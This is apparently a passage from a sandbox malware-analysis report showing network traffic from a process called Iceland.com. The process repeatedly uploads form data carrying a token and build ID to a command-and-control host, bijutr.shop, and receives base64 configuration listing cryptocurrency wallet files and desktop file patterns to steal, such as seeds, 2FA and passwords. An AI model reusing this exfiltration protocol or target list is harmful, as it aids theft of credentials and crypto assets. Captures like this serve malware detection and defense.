                                                                                                                                                                                                                                                              2024-12-27 06:10:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 51 49 35 46 43 42 41 49 4d 47 4c 4e 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 51 49 35 46 43 42 41 49 4d 47 4c 4e 37 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 51 49 35 46 43 42 41 49 4d 47 4c 4e 37 59 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------CJW47QI5FCBAIMGLN7YUContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------CJW47QI5FCBAIMGLN7YUContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------CJW47QI5FCBAIMGLN7YUCont
2024-12-27 06:10:06 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49783 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:06 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9ZMGDJMO89RQQIMO8QI5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:06 UTC | 16355 | OUT | Data Ascii: ------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------9ZMGDJMO89RQQIMO8QI5Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------9ZMGDJMO89RQQIMO8QI5Cont
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:08 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49791 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:08 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PP8Y5FC2NGV3EUS26P89
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:08 UTC | 16355 | OUT | Data Ascii: ------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------PP8Y5FC2NGV3EUS26P89Cont
2024-12-27 06:10:10 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49796 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:11 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----89RQQQIWLXBIEUAIECT2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:11 UTC | 16355 | OUT | Data Ascii: ------89RQQQIWLXBIEUAIECT2Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------89RQQQIWLXBIEUAIECT2Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------89RQQQIWLXBIEUAIECT2Cont
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:19 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49802 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:12 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----5XT00ZUAAI5FU3WLXTR9
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:12 UTC | 331 | OUT | Data Ascii:
------5XT00ZUAAI5FU3WLXTR9
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------5XT00ZUAAI5FU3WLXTR9
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------5XT00ZUAAI5FU3WLXTR9
Cont
2024-12-27 06:10:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:13 UTC | 2228 | IN | Data:
                                                                                                                                                                                                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49808 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:15 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:15 UTC | 331 | OUT | Data Ascii:
------UAS0ZU3EUA1NYMY58GLX
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------UAS0ZU3EUA1NYMY58GLX
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------UAS0ZU3EUA1NYMY58GLX
Cont
2024-12-27 06:10:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:15 UTC | 2208 | IN | Data:
                                                                                                                                                                                                                                                              Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49838 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:28 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----DBA1DBSRQQ9ZUASRIWLF
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 32481
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:28 UTC | 16355 | OUT | Data Ascii:
------DBA1DBSRQQ9ZUASRIWLF
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------DBA1DBSRQQ9ZUASRIWLF
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------DBA1DBSRQQ9ZUASRIWLF
Cont
2024-12-27 06:10:28 UTC | 16126 | OUT
2024-12-27 06:10:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49840 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:29 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HVKX4WTJM7G4E3W47YUS
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 4421
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:29 UTC | 4421 | OUT | Data Ascii:
------HVKX4WTJM7G4E3W47YUS
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------HVKX4WTJM7G4E3W47YUS
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------HVKX4WTJM7G4E3W47YUS
Cont
2024-12-27 06:10:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49846 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:31 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KXB1DTJ58Q9RQQQIWL6F
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 2449
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:31 UTC | 2449 | OUT | Data Ascii:
------KXB1DTJ58Q9RQQQIWL6F
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------KXB1DTJ58Q9RQQQIWL6F
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------KXB1DTJ58Q9RQQQIWL6F
Cont
2024-12-27 06:10:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49849 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:32 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----KXB1DTJ58Q9RQQQIWL6F
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 6533
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:32 UTC | 6533 | OUT | Data Ascii:
------KXB1DTJ58Q9RQQQIWL6F
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------KXB1DTJ58Q9RQQQIWL6F
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------KXB1DTJ58Q9RQQQIWL6F
Cont
2024-12-27 06:10:33 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:33 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:33 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.4 | 49853 | 188.245.216.205 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:34 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 3269
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:10:34 UTC | 3269 | OUT | Data Ascii:
------AAAAAAAAAAAAAAAAAAAA
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------AAAAAAAAAAAAAAAAAAAA
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------AAAAAAAAAAAAAAAAAAAA
Cont
2024-12-27 06:10:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:10:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              29192.168.2.449859188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:35 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3WB1NY58Q9RIMYCT00ZU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 11445
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
